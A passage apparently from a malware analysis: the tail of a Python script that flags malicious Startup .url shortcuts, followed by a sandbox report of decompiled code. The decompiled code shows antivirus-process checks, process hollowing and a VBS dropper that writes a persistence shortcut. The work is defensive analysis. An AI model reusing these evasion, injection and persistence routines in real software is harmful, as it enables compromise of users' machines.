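        for name in os.listdir(folder) if os.path.isdir(folder) else []:
            if name.lower().endswith(".url"):
                data = open(os.path.join(folder, name), "rb").read()
                f = assess_shortcut(data.decode("utf-16" if b"\x00" in data[:64] else "utf-8", errors="replace"))
                if f.suspicious:
                    hits.append(f)
    return hits

if __name__ == "__main__":
    for f in [assess_shortcut(SAMPLE_URL_FILE)] + scan_startup_folders():
        print(f.local_path or f.url, "->", "; ".join(f.reasons) or "no findings")
    print("VBS dropper target:", dropper_vbs_target(SAMPLE_VBS))
```

Run it on a live host to list flagged shortcuts from both Startup folders; on a non-Windows analysis box the folder walk is skipped and only the constructed sample is scored. Scoring deliberately ignores http(s) shortcuts, which are what a Startup .url normally carries, so the rule set stays quiet on benign machines while still catching a file:/// target in ProgramData.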
                                                                                                                                          0x004068c0
                                                                                                                                          0x004068cf
                                                                                                                                          0x004068da
                                                                                                                                          0x00406707
                                                                                                                                          0x00406713
                                                                                                                                          0x00406724
                                                                                                                                          0x00406737
                                                                                                                                          0x00406748
                                                                                                                                          0x00406759
                                                                                                                                          0x0040676a
                                                                                                                                          0x0040677d
                                                                                                                                          0x0040678e
                                                                                                                                          0x004067a2
                                                                                                                                          0x004067b5
                                                                                                                                          0x004067ba
                                                                                                                                          0x004067bd
                                                                                                                                          0x004067bf
                                                                                                                                          0x00406862
                                                                                                                                          0x00406862
                                                                                                                                          0x00406868
                                                                                                                                          0x004067c5
                                                                                                                                          0x004067cc
                                                                                                                                          0x004067d9
                                                                                                                                          0x004067e6
                                                                                                                                          0x004067ef
                                                                                                                                          0x004067f4
                                                                                                                                          0x004067f7
                                                                                                                                          0x004067f9
                                                                                                                                          0x00000000
                                                                                                                                          0x004067fb
                                                                                                                                          0x004067ff
                                                                                                                                          0x004067ff
                                                                                                                                          0x004067f9
                                                                                                                                          0x004067bf
                                                                                                                                          0x00406701
                                                                                                                                          0x004066ea
                                                                                                                                          0x004066d5
                                                                                                                                          0x004066c0
                                                                                                                                          0x0040665e
                                                                                                                                          0x0040665e
                                                                                                                                          0x00406663
                                                                                                                                          0x00406663

APIs
  • Part of subcall function 00407FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
  • Part of subcall function 00407FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
  • Part of subcall function 00407FA0: CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
  • Part of subcall function 00407FA0: FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
• Sleep.KERNEL32(00000BB8), ref: 004067D9
• DeleteFileW.KERNELBASE(?), ref: 004067E6
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
• String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
• API String ID: 976351581-227138989
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
			E00406A40(void* __ecx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v612;
				char _v740;
				short _v1780;
				char _v5876;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t38;
				int _t48;
				void* _t54;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;

				_t71 = __ecx;
				E00401BB0( &_v5876, 0, 0x1000);
				_v8 = 0;
				E00401BB0( &_v740, 0, 0x288);
				E00401670( &_v740, 0, 0x288);
				_t74 = _a4;
				E00401A00( &_v612, _a4);
				_t38 = E00407ED0(_a4); // executed
				_t82 = _t81 + 0x30;
				if(_t38 == 0) {
					return _t38;
				}
				_push(_t68);
				_push(_t76);
				if(E00408DD0() == 0) {
					L22:
					E00401BB0( &_v92, 0, 0x44);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x14], xmm0");
					E00401A00( &_v1780, L"cmd.exe /C WScript \"");
					E00401970( &_v1780, _t74);
					E00401970( &_v1780, "\"");
					_t48 = E00407ED0(_t74); // executed
					if(_t48 != 0) {
						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
						CloseHandle(_v24.hThread);
						_t48 = CloseHandle(_v24);
					}
					L24:
					return _t48;
				}
				_t54 = E00407EF0("bdagent.exe"); // executed
				_t84 = _t82 + 4;
				if(_t54 != 0) {
					L10:
					_push(0x1000);
					_push( &_v5876);
					if( *0x5d1314 == 0) {
						_push(0);
						_t48 = E004029E0( &_v740, 0x400000, E004080E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t84 + 0x24;
						if(_t48 == 0 || _v8 == 0) {
							goto L22;
						} else {
							goto L24;
						}
					}
					_push(1);
					_t70 = E004080E0(_t68, _t74, _t76);
					_t82 = _t84 + 0xc;
					if(_t70 == 0) {
						goto L22;
					}
					_t79 = 0;
					if(_t70 == 0) {
						goto L22;
					}
					do {
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
							goto L18;
						}
						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
							goto L18;
						}
						_t48 = E004029E0(_t71, 0x400000, _t75,  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t82 + 0x18;
						if(_t48 != 0 && _v8 != 0) {
							goto L24;
						}
						L18:
						_t79 = _t79 + 1;
					} while (_t79 < _t70);
					_t74 = _a4;
					goto L22;
				}
				_t61 = E00407EF0("vsserv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t61 != 0) {
					goto L10;
				}
				_t62 = E00407EF0("cfp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t62 != 0) {
					goto L10;
				}
				_t63 = E00407EF0("ccavsrv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t63 != 0) {
					goto L10;
				}
				_t64 = E00407EF0("cmdagent.exe"); // executed
				_t84 = _t84 + 4;
				if(_t64 != 0) {
					goto L10;
				}
				_t65 = E00407EF0("avp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t65 != 0) {
					goto L10;
                                                                                                                                          				}
                                                                                                                                          				_t66 = E00407EF0("avpui.exe"); // executed
                                                                                                                                          				_t84 = _t84 + 4;
                                                                                                                                          				if(_t66 != 0) {
                                                                                                                                          					goto L10;
                                                                                                                                          				}
                                                                                                                                          				_t67 = E00407EF0("ksde.exe"); // executed
                                                                                                                                          				_t82 = _t84 + 4;
                                                                                                                                          				if(_t67 == 0) {
                                                                                                                                          					goto L22;
                                                                                                                                          				}
                                                                                                                                          				goto L10;
                                                                                                                                          			}
Instruction addresses (decompiler address gutter, detached from the code lines above during extraction): 0x00406a40 through 0x00406c9a, with 0x00000000 entries marking unresolved lines.

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406B91
                                                                                                                                            • Part of subcall function 00407EF0: Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                                                            • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F48
                                                                                                                                            • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F6D
                                                                                                                                            • Part of subcall function 00407EF0: FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                                                            • Part of subcall function 00407EF0: CloseHandle.KERNEL32(00000000,00000001,?), ref: 00407F86
                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406C7E
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 00406C8D
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 00406C92
                                                                                                                                            • Part of subcall function 00407EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close$HandleProcess32$CreateNextProcess$AttributesChangeCurrentFileFindFirstNotificationSnapshotToolhelp32
                                                                                                                                          • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                                                          • API String ID: 784547097-1880040858
                                                                                                                                          • Opcode ID: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                                                          • Instruction ID: e8651156ccd0aa44593a489e188d373cfd9c837c14a664b72568e472e4b0eebb
                                                                                                                                          • Opcode Fuzzy Hash: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                                                          • Instruction Fuzzy Hash: 97512071D4030565FB209A519D47FAB727D5B00788F14007BB905B11C2FBBDBE54866E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                          			E00405E60(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                          				intOrPtr _v8;
                                                                                                                                          				signed int _v16;
                                                                                                                                          				signed int _v20;
                                                                                                                                          				void* _v24;
                                                                                                                                          				intOrPtr _v32;
                                                                                                                                          				void* _v36;
                                                                                                                                          				void* _v40;
                                                                                                                                          				char _v44;
                                                                                                                                          				char _v48;
                                                                                                                                          				signed int _v56;
                                                                                                                                          				char _v60;
                                                                                                                                          				char _v132;
                                                                                                                                          				intOrPtr _v1232;
                                                                                                                                          				intOrPtr _v1236;
                                                                                                                                          				intOrPtr _v1240;
                                                                                                                                          				intOrPtr _v1244;
                                                                                                                                          				intOrPtr _v1324;
                                                                                                                                          				char _v1372;
                                                                                                                                          				signed int _t99;
                                                                                                                                          				int _t107;
                                                                                                                                          				void* _t109;
                                                                                                                                          				void* _t116;
                                                                                                                                          				intOrPtr _t117;
                                                                                                                                          				signed int _t118;
                                                                                                                                          				signed int _t122;
                                                                                                                                          				void* _t132;
                                                                                                                                          				void* _t145;
                                                                                                                                          				void* _t151;
                                                                                                                                          				void* _t153;
                                                                                                                                          				void* _t154;
                                                                                                                                          				signed int _t159;
                                                                                                                                          				void* _t173;
                                                                                                                                          				intOrPtr _t174;
                                                                                                                                          				signed int _t175;
                                                                                                                                          				signed int _t176;
                                                                                                                                          				intOrPtr* _t181;
                                                                                                                                          				signed int _t182;
                                                                                                                                          				intOrPtr* _t185;
                                                                                                                                          				signed int _t188;
                                                                                                                                          				intOrPtr* _t192;
                                                                                                                                          				void* _t199;
                                                                                                                                          				void* _t204;
                                                                                                                                          				void* _t205;
                                                                                                                                          				void* _t208;
                                                                                                                                          				void* _t209;
                                                                                                                                          				void* _t210;
                                                                                                                                          				void* _t223;
                                                                                                                                          				signed int _t225;
                                                                                                                                          
                                                                                                                                          				_t175 = __edx;
                                                                                                                                          				_t154 = __ecx;
                                                                                                                                          				_t153 = _t199;
                                                                                                                                          				_v8 =  *((intOrPtr*)(_t153 + 4));
                                                                                                                                          				E00401BB0( &_v1372, 0, 0x4d0);
                                                                                                                                          				_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                                                          				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
                                                                                                                                          				_v1324 = 0x100002;
                                                                                                                                          				asm("xorps xmm0, xmm0");
                                                                                                                                          				asm("movlpd [ebp-0x30], xmm0");
                                                                                                                                          				_t215 =  *_t185 - 0x5a4d;
                                                                                                                                          				if( *_t185 != 0x5a4d) {
                                                                                                                                          					E00401CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
                                                                                                                                          					_t204 = _t204 + 0x10;
                                                                                                                                          				}
                                                                                                                                          				_t99 = E00401E50(_t154, _t175, _t215, "ntdll.dll");
                                                                                                                                          				_v20 = _t99;
                                                                                                                                          				_t205 = _t204 + 4;
                                                                                                                                          				_v16 = _t175;
                                                                                                                                          				_t156 = _t99 | _t175;
                                                                                                                                          				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
                                                                                                                                          					L34:
                                                                                                                                          					__eflags = 0;
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
                                                                                                                                          					if( *_t181 != 0x4550) {
                                                                                                                                          						goto L34;
                                                                                                                                          					} else {
                                                                                                                                          						E00401670( &_v132, 0, 0x44);
                                                                                                                                          						E00401670( &_v40, 0, 0x10);
                                                                                                                                          						_t208 = _t205 + 0x18;
                                                                                                                                          						_v132 = 0x44;
                                                                                                                                          						_push( &_v40);
                                                                                                                                          						_push( &_v132);
                                                                                                                                          						_push(0);
                                                                                                                                          						_push(0);
                                                                                                                                          						if( *0x5d1bb8 == 0) {
                                                                                                                                          							_push(4);
                                                                                                                                          						} else {
                                                                                                                                          							_push(0x800000c);
                                                                                                                                          						}
                                                                                                                                          						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??); // executed
                                                                                                                                          						_t220 = _t107;
                                                                                                                                          						if(_t107 == 0) {
                                                                                                                                          							goto L34;
                                                                                                                                          						} else {
                                                                                                                                          							_t109 = E004061F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372); // executed
                                                                                                                                          							_t209 = _t208 + 0x10;
                                                                                                                                          							_t221 = _t109;
                                                                                                                                          							if(_t109 == 0) {
                                                                                                                                          								L33:
                                                                                                                                          								TerminateProcess(_v40, 0);
                                                                                                                                          								CloseHandle(_v36);
                                                                                                                                          								CloseHandle(_v40);
                                                                                                                                          								goto L34;
                                                                                                                                          							} else {
                                                                                                                                          								asm("adc eax, 0x0");
                                                                                                                                          								_t116 = E00406250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24); // executed
                                                                                                                                          								_t210 = _t209 + 0x20;
                                                                                                                                          								if(_t116 == 0) {
                                                                                                                                          									goto L33;
                                                                                                                                          								} else {
                                                                                                                                          									_t159 =  *((intOrPtr*)(_t181 + 0x34));
                                                                                                                                          									_t176 = _v56;
                                                                                                                                          									_t117 =  *((intOrPtr*)(_t181 + 0x30));
                                                                                                                                          									_v20 = _t159;
                                                                                                                                          									_t223 = _t176 - _t159;
                                                                                                                                          									if(_t223 < 0) {
                                                                                                                                          										L18:
                                                                                                                                          										_t118 = E004072C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
                                                                                                                                          										_v20 = _t118;
                                                                                                                                          										_v16 = _t176;
                                                                                                                                          										if((_t118 | _t176) == 0 || E004074D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
                                                                                                                                          											goto L33;
                                                                                                                                          										} else {
                                                                                                                                          											_t188 = _v20;
                                                                                                                                          											if(E004073C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
                                                                                                                                          												goto L33;
                                                                                                                                          											} else {
                                                                                                                                          												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
                                                                                                                                          												_v24 = 0;
                                                                                                                                          												if(0 >=  *(_t181 + 6)) {
                                                                                                                                          													L27:
                                                                                                                                          													asm("adc eax, 0x0");
                                                                                                                                          													if(E004074D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
                                                                                                                                          														goto L33;
                                                                                                                                          													} else {
                                                                                                                                          														_t182 = _v16;
                                                                                                                                          														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
                                                                                                                                          														asm("adc ecx, edi");
                                                                                                                                          														_v1240 = 0;
                                                                                                                                          														if(E00407230(0, _t176, _v36,  &_v1372) == 0 || E004071A0(0, _t176, _v36) == 0) {
                                                                                                                                          															goto L33;
                                                                                                                                          														} else {
                                                                                                                                          															Sleep(0x1388); // executed
                                                                                                                                          															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4); // executed
                                                                                                                                          															_v24 = _t132;
                                                                                                                                          															if(_t132 != 0) {
                                                                                                                                          																E00401BB0(_t132, 0, 0x138);
                                                                                                                                          																E004074D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
                                                                                                                                          																VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                          															}
                                                                                                                                          															FindCloseChangeNotification(_v36); // executed
                                                                                                                                          															CloseHandle(_v40);
                                                                                                                                          															return _v32;
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          												} else {
                                                                                                                                          													_t192 = _t181 + 0x2c + _t122;
                                                                                                                                          													while(1) {
                                                                                                                                          														asm("adc eax, [ebp-0x4]");
                                                                                                                                          														if(E004074D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
                                                                                                                                          															goto L33;
                                                                                                                                          														}
                                                                                                                                          														_t145 = E00406300( *((intOrPtr*)(_t192 + 0x10)));
                                                                                                                                          														_t210 = _t210 + 4;
                                                                                                                                          														asm("adc eax, [ebp-0x4]");
                                                                                                                                          														if(E004073C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
                                                                                                                                          															goto L33;
                                                                                                                                          														} else {
                                                                                                                                          															_t192 = _t192 + 0x28;
                                                                                                                                          															_t173 = _v24 + 1;
                                                                                                                                          															_v24 = _t173;
                                                                                                                                          															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
                                                                                                                                          																continue;
                                                                                                                                          															} else {
                                                                                                                                          																_t188 = _v20;
                                                                                                                                          																goto L27;
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          														goto L35;
                                                                                                                                          													}
                                                                                                                                          													goto L33;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										_t174 = _v60;
                                                                                                                                          										if(_t223 > 0 || _t174 >= _t117) {
                                                                                                                                          											_v16 =  *((intOrPtr*)(_t181 + 0x50));
                                                                                                                                          											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
                                                                                                                                          											_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                                                          											asm("adc eax, [ebp-0x8]");
                                                                                                                                          											_t225 = _t176;
                                                                                                                                          											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
                                                                                                                                          												goto L18;
                                                                                                                                          											} else {
                                                                                                                                          												_t151 = E00407120(_t176, _v40, _t174, _t176);
                                                                                                                                          												_t227 = _t151;
                                                                                                                                          												if(_t151 != 0) {
                                                                                                                                          													goto L33;
                                                                                                                                          												} else {
                                                                                                                                          													goto L18;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										} else {
                                                                                                                                          											goto L18;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				L35:
                                                                                                                                          			}
                                                                                                                                          0x00405e60
                                                                                                                                          0x00405e60
                                                                                                                                          0x00405e61
                                                                                                                                          0x00405e70
                                                                                                                                          0x00405e8c
                                                                                                                                          0x00405e91
                                                                                                                                          0x00405e99
                                                                                                                                          0x00405e9c
                                                                                                                                          0x00405ea6
                                                                                                                                          0x00405ea9
                                                                                                                                          0x00405eae
                                                                                                                                          0x00405eb1
                                                                                                                                          0x00405ebe
                                                                                                                                          0x00405ec3
                                                                                                                                          0x00405ec3
                                                                                                                                          0x00405ecb
                                                                                                                                          0x00405ed2
                                                                                                                                          0x00405ed5
                                                                                                                                          0x00405ed8
                                                                                                                                          0x00405edb
                                                                                                                                          0x00405edd
                                                                                                                                          0x004061de
                                                                                                                                          0x004061df
                                                                                                                                          0x004061e8
                                                                                                                                          0x00405eec
                                                                                                                                          0x00405eef
                                                                                                                                          0x00405ef7
                                                                                                                                          0x00000000
                                                                                                                                          0x00405efd
                                                                                                                                          0x00405f05
                                                                                                                                          0x00405f12
                                                                                                                                          0x00405f17
                                                                                                                                          0x00405f1a
                                                                                                                                          0x00405f2b
                                                                                                                                          0x00405f2f
                                                                                                                                          0x00405f30
                                                                                                                                          0x00405f32
                                                                                                                                          0x00405f34
                                                                                                                                          0x00405f3d
                                                                                                                                          0x00405f36
                                                                                                                                          0x00405f36
                                                                                                                                          0x00405f36
                                                                                                                                          0x00405f4a
                                                                                                                                          0x00405f50
                                                                                                                                          0x00405f52
                                                                                                                                          0x00000000
                                                                                                                                          0x00405f58
                                                                                                                                          0x00405f68
                                                                                                                                          0x00405f6d
                                                                                                                                          0x00405f70
                                                                                                                                          0x00405f72
                                                                                                                                          0x004061c3
                                                                                                                                          0x004061c8
                                                                                                                                          0x004061d7
                                                                                                                                          0x004061dc
                                                                                                                                          0x00000000
                                                                                                                                          0x00405f78
                                                                                                                                          0x00405f91
                                                                                                                                          0x00405f9f
                                                                                                                                          0x00405fa4
                                                                                                                                          0x00405fa9
                                                                                                                                          0x00000000
                                                                                                                                          0x00405faf
                                                                                                                                          0x00405faf
                                                                                                                                          0x00405fb2
                                                                                                                                          0x00405fb5
                                                                                                                                          0x00405fb8
                                                                                                                                          0x00405fbb
                                                                                                                                          0x00405fbd
                                                                                                                                          0x00405ff9
                                                                                                                                          0x0040600c
                                                                                                                                          0x00406013
                                                                                                                                          0x00406018
                                                                                                                                          0x0040601b
                                                                                                                                          0x00000000
                                                                                                                                          0x0040603b
                                                                                                                                          0x0040603b
                                                                                                                                          0x00406055
                                                                                                                                          0x00000000
                                                                                                                                          0x0040605b
                                                                                                                                          0x0040605b
                                                                                                                                          0x00406061
                                                                                                                                          0x0040606c
                                                                                                                                          0x004060e2
                                                                                                                                          0x004060fb
                                                                                                                                          0x0040610a
                                                                                                                                          0x00000000
                                                                                                                                          0x00406110
                                                                                                                                          0x00406115
                                                                                                                                          0x0040611a
                                                                                                                                          0x0040612a
                                                                                                                                          0x0040612c
                                                                                                                                          0x00406139
                                                                                                                                          0x00000000
                                                                                                                                          0x0040614b
                                                                                                                                          0x00406150
                                                                                                                                          0x00406164
                                                                                                                                          0x0040616a
                                                                                                                                          0x0040616f
                                                                                                                                          0x00406179
                                                                                                                                          0x00406192
                                                                                                                                          0x004061a1
                                                                                                                                          0x004061a1
                                                                                                                                          0x004061b0
                                                                                                                                          0x004061b5
                                                                                                                                          0x004061c2
                                                                                                                                          0x004061c2
                                                                                                                                          0x00406139
                                                                                                                                          0x0040606e
                                                                                                                                          0x00406071
                                                                                                                                          0x00406073
                                                                                                                                          0x00406088
                                                                                                                                          0x00406097
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004060a0
                                                                                                                                          0x004060a5
                                                                                                                                          0x004060b8
                                                                                                                                          0x004060c7
                                                                                                                                          0x00000000
                                                                                                                                          0x004060cd
                                                                                                                                          0x004060d0
                                                                                                                                          0x004060d7
                                                                                                                                          0x004060d8
                                                                                                                                          0x004060dd
                                                                                                                                          0x00000000
                                                                                                                                          0x004060df
                                                                                                                                          0x004060df
                                                                                                                                          0x00000000
                                                                                                                                          0x004060df
                                                                                                                                          0x004060dd
                                                                                                                                          0x00000000
                                                                                                                                          0x004060c7
                                                                                                                                          0x00000000
                                                                                                                                          0x00406073
                                                                                                                                          0x0040606c
                                                                                                                                          0x00406055
                                                                                                                                          0x00405fbf
                                                                                                                                          0x00405fbf
                                                                                                                                          0x00405fc2
                                                                                                                                          0x00405fce
                                                                                                                                          0x00405fd3
                                                                                                                                          0x00405fd6
                                                                                                                                          0x00405fd9
                                                                                                                                          0x00405fdc
                                                                                                                                          0x00405fde
                                                                                                                                          0x00000000
                                                                                                                                          0x00405fe7
                                                                                                                                          0x00405fec
                                                                                                                                          0x00405ff1
                                                                                                                                          0x00405ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405fc2
                                                                                                                                          0x00405fbd
                                                                                                                                          0x00405fa9
                                                                                                                                          0x00405f72
                                                                                                                                          0x00405f52
                                                                                                                                          0x00405ef7
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,00000044,?), ref: 00405F4A
                                                                                                                                          • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 00406150
                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 00406164
                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 004061A1
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B0
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B5
                                                                                                                                            • Part of subcall function 004074D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 004074FF
                                                                                                                                            • Part of subcall function 004073C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 00407429
                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061C8
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061D7
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061DC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseProcess$Handle$CurrentVirtual$AllocChangeCreateFindFreeNotificationSleepTerminate
                                                                                                                                          • String ID: 0125789244697858$ntdll.dll$I@
                                                                                                                                          • API String ID: 3897173628-1460664302
                                                                                                                                          • Opcode ID: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                                                          • Instruction ID: 1d2188587597bc53f96400c66c54050a6bc471ffeb9cfe25592a30c854cca956
                                                                                                                                          • Opcode Fuzzy Hash: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                                                          • Instruction Fuzzy Hash: E9B18071D00209BBEF109B95CD41FAEBBB9FF04304F14406AFA05B62D1E779A960DB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                          			E00407FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                          				char _v8;
                                                                                                                                          				_Unknown_base(*)()* _t11;
                                                                                                                                          				_Unknown_base(*)()* _t12;
                                                                                                                                          				void* _t17;
                                                                                                                                          				struct HINSTANCE__* _t22;
                                                                                                                                          
                                                                                                                                          				_t22 = LoadLibraryA("Shell32.dll");
                                                                                                                                          				if(_t22 == 0) {
                                                                                                                                          					L8:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
                                                                                                                                          					if(_t11 == 0) {
                                                                                                                                          						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
                                                                                                                                          						if(_t12 == 0) {
                                                                                                                                          							goto L7;
                                                                                                                                          						} else {
                                                                                                                                          							_push(_a4);
                                                                                                                                          							_push(0);
                                                                                                                                          							_push(0);
                                                                                                                                          							_push(_a12);
                                                                                                                                          							_push(0);
                                                                                                                                          							if( *_t12() == 0) {
                                                                                                                                          								goto L4;
                                                                                                                                          							} else {
                                                                                                                                          								goto L7;
                                                                                                                                          							}
